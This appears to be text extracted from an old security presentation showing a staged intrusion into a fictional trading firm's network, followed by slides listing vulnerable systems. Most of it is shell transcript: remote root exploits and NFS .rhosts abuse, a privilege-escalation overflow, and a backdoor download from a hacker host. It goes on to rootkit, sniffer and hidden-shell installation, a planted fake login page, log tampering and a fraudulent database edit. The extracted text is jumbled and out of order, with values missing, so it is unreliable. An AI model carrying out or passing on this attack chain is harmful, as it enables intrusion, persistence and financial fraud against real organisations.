Пример атаки

WHOIS Search

ACMETRADE.COM

Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA Domain Name: ACMETRADE.COM Administrative Contact: Vaughn, Danon (ES2394) (678) (FAX) (678) Technical Contact, Zone Contact: Bergman, Bret (ET2324) (678) (FAX) (678) Billing Contact: Fields, Hope (ET3427) (678) (FAX) (678) Record Last updated on 27-Jul-99. Record created on 06-Mar-98. Database last updated on 4-Oct-99 09:09:01 EDT Domain servers in listed order: dns.acmetrade.com www1.acmetrade.com www2.acmetrade.com

hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsd Scanning dns.acmetrade.com for program cmsd is on port hacker:/export/home/hacker>

id uid=1002(hacker) gid=10(staff) hacker:/export/home/hacker> uname -a SunOS evil.hacker.com 5.6 Generic_ sun4u sparc SUNW,UltraSPARC-IIi-Engine hacker:/export/home/hacker>./cmsd dns.acmetrade.com using source port 53 rtable_create worked Exploit successful. Portshell created on port hacker:/export/home/hacker> Trying Connected to dns.acmetrade.com. Escape character is '^]'. # id uid=0(root) gid=0(root) # uname -a SunOS dns Generic_ sun4m sparc SUNW,SPARCstation-5 # telnet dns.acmetrade.com 33505

# # nslookup Default Server: dns.acmetrade.com Address: > > ls acmetrade.com Received 15 records. ^D [dns.acmetrade.com] www1.acmetrade.com www2.acmetrade.com margin.acmetrade.com marketorder.acmetrade.com deriv.acmetrade.com deriv1.acmetrade.com bond.acmetrade.com ibd.acmetrade.com fideriv.acmetrade.com backoffice.acmetrade.com wiley.acmetrade.com bugs.acmetrade.com fw.acmetrade.com fw1.acmetrade.com

# # # # rpcinfo -p | grep mountd udp 643 mountd tcp 647 mountd showmount -e /usr/localserver2, server3, server4 /export/home sunspot rpcinfo -p www1.acmetrade.com | grep mountd udp 643 mountd tcp 647 mountd showmount -e www1.acmetrade.com /data1server2 /aengineering /bengineering /cengineering /export/home(everyone) export list for #

nfs

nfsshell.c

/data1server2 /aengineering /bengineering /cengineering /export/home(everyone) Export list for www1.acmetrade.com: nfs> mount /export/home Mount www1.acmetrade.com[ ]:/export/home nfs> ls bill bob celeste chuck dan dave jenn zack nfs> ls –l bob drwxr-xr-x May bob - protocol: UDP/IP - transfer size: 8192 bytes nfs> cd bob uid 201 gid 1 # nfsshell nfs> host www1.acmetrade.com Open www1.acmetrade.com[ ] (mountd) using UDP/IP nfs> export

status User id : 201 Group id : 1 Remote host : www1.acmetrade.com Mount path : /export/home Transfer size: 8192 nfs> !sh $ echo "+ +" >.rhosts $exit nfs> put.rhosts cat.rhosts + nfs> exit # rlogin -l bob www1.acmetrade.com Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com www1% whoami bob www1% pwd /export/home/bob www1 % uname -a SunOS www1.acmetrade.com Generic_ sun4d SUNW,SPARCserver-1000 www1% cat.rhosts +

www1% ls -la /usr/bin/eject -r-sr-xr-x 1 root bin Jul /usr/bin/eject* www1% gcc -o eject_overflow eject_overflow.c./eject_overflow Jumping to address 0xeffff630 B[364] E[400] SO[400] # whoami root # ftp evil.hacker.com Connected to evil.hacker.com. Name (evil.hacker.com:root): 331 Password required for hacker. Password: 230 User hacker logged in. Remote system type is UNIX. Using binary mode to transfer files. hacker eye0wnu 220 evil.hacker.com FTP server (HackerOS) ready.

ftp> cd solaris_backdoors 250 CWD command successful. ftp> get solaris_backdoor.tar.gz 200 PORT command successful. 150 Binary data connection for out ,1152). 226 Transfer complete bytes sent in secs (4.7Kbytes/sec) ftp> quit tar -xf module_backdoor.tar cd /tmp/my_tools gunzip module_backdoor.tar.gz # # #

# cd /tmp/my_tools/module_backdoor #./configure Enter directories and filenames to hide from ls, find, du: # make gcc -c backdoor.c gcc -o installer installer.c ld –o backdoor –r backdoor.o # Makefile backdoor backdoor.c backdoor.o config.h configure installer installer.c ls # # modload backdoor./installer -d /usr/local/share/... Adding directory... Fixing last modified time... Fixing last accessed time backdoor Enter class C network to hide from netstat: Enter process names to hide from ps and lsof: creating config.h sniffer

# ls -la /usr/local/share/......: No such file or directory # # # # # #./installer backdoor /usr/local/share/.../backdoor Installing file... Fixing last modified time... Fixing last accessed time... echo "/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd # cd.. rm -rf module_backdoor ls inetd_backdoor/ logedit sniffer./installer sniffer /usr/local/share/.../sniffer Installing file... Fixing last modified time... Fixing last accessed time... ls /usr/local/share/.../sniffer /usr/local/share/.../sniffer: No such file or directory # cd /usr/local/share/... #./sniffer > out & # ps -aef | grep sniffer #

# netstat TCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State ESTABLISHED ESTABLISHED ESTABLISHED # cd /tmp/my_tools # cd inetd_backdoor # ls config.h configure inetd.c installer.c #./configure Enter port for hidden shell: # make gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv gcc -o installer installer.c # installer inetd /usr/sbin/inetd Installing file... Fixing last modified time... Fixing last accessed time... creating config.h... creating Makefile

Trying Escape character is '^]'. telnet www1.acmetrade.com Granting rootshell... # hostname www1 # whoami root # # ps –aef | grep inetd root May 10 ? 1:26 /usr/sbin/inetd -s # # kill –9 179 # exit /usr/sbin/inetd –s & Connection closed by foreign host. hacker:/export/home/hacker>

ftp www1.acmetrade.com Connected to www1 220 www1.acmetrade.com FTP service (Version 2.5). Name: root 331 Password required for root. Password: ******* 230 User root logged in. Remote system type is Unix. ftp> put backdoor.html securelogin.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 root other 1024 Aug 17 17:07. -rwxr-xr-x 9 root other 1024 Aug 17 17:07.. -rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html -rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2. gif -rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir ftp> cd /usr/local/httpd

program vers proto port service tcp 111 rpcbind tcp 111 rpcbind tcp 111 rpcbind udp 111 rpcbind udp 111 rpcbind udp 111 rpcbind udp 753 ypserv udp 753 ypserv tcp 754 ypserv tcp ypserv udp udp ypbind udp ypbind udp ypbind tcp ypbind tcp ypbind tcp ypbind udp rquotad udp udp udp udp udp status tcp status udp 4045 nlockmgr udp 4045 nlockmgr # rpcinfo -p backoffice.acmetrade.com

udp 4045 nlockmgr udp 4045 nlockmgr tcp 4045 nlockmgr tcp 4045 nlockmgr tcp 4045 nlockmgr tcp 4045 nlockmgr udp mountd udp mountd udp mountd tcp mountd tcp mountd tcp mountd tcp udp 2049 nfs udp 2049 nfs udp 2049 nfs_acl udp 2049 nfs_acl tcp 2049 nfs tcp 2049 nfs tcp 2049 nfs_acl tcp 2049 nfs_acl # # grep ttdbserverd /etc/inetd.conf /1tlirpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd rpcinfo -p backoffice.acmetrade.com | grep tcp # cd /tmp/mytools/warez

Please wait for your root shell. #./tt backoffice.acmetrade.com hostname backoffice whoami root # find / -type f -name.rhosts -print /.rhosts /export/home/chuck/.rhosts /export/home/bill/.rhosts /export/home/larry/.rhosts # cat /.rhosts fideriv.acmetrade root ibd.acmetrade root bugs.acmetraderoot # w 10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh root pts/5 9:24pm /sbin/sh # # # /tmp/mytools/logedit root pts/5 # w 10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh

# sqlplus oracle/oracle SQL> describe customers NameNull?Type LNAMENOT NULL VARCHAR2(20) FNAMENOT NULL VARCHAR2(15) ADDR1NOT NULL VARCHAR2(30) ZIPNOT NULL NUMBER(5) PHONENOT NULL CHAR(12) ACCOUNT_NUMNOT NULL NUMBER(12) BALANCENOT NULL NUMBER(12) MARGIN_LIMITNOT NULL NUMBER(12) ACCT_OPENNOT NULL DATE SQL> select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski'; LNAME FNAMEACCOUNT_NUM MARGIN_LIMIT Gerulski David SQL> update customers set MARGIN_LIMIT = where LNAME = 'Gerulski'; select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski'; LNAME MARGIN_LIMIT Gerulski SQL> exit

Anatomy of the Attack AcmeTrades Network UNIX Firewall DNS Server Web Server Filtering Router NT Clients & Workstations Network UNIX NTUNIX rpc.cmsd nfs / eject tooltalk /oracle

IT Infrastructure Firewall Server Web Server Router Servers Clients & Workstations Network What is Vulnerable?

Applications Router E-Commerce Web Server Server Firewall SAP Peoplesoft Web Browsers What is Vulnerable?

Databases Firewall Router Oracle Microsoft SQL Server Sybase What is Vulnerable?

Firewall AIX Solaris Router Windows NT Network Operating Systems HP-UX Windows 95 & NT What is Vulnerable?

Firewall Server Web Server Router Servers Networks TCP/IP Netware What is Vulnerable?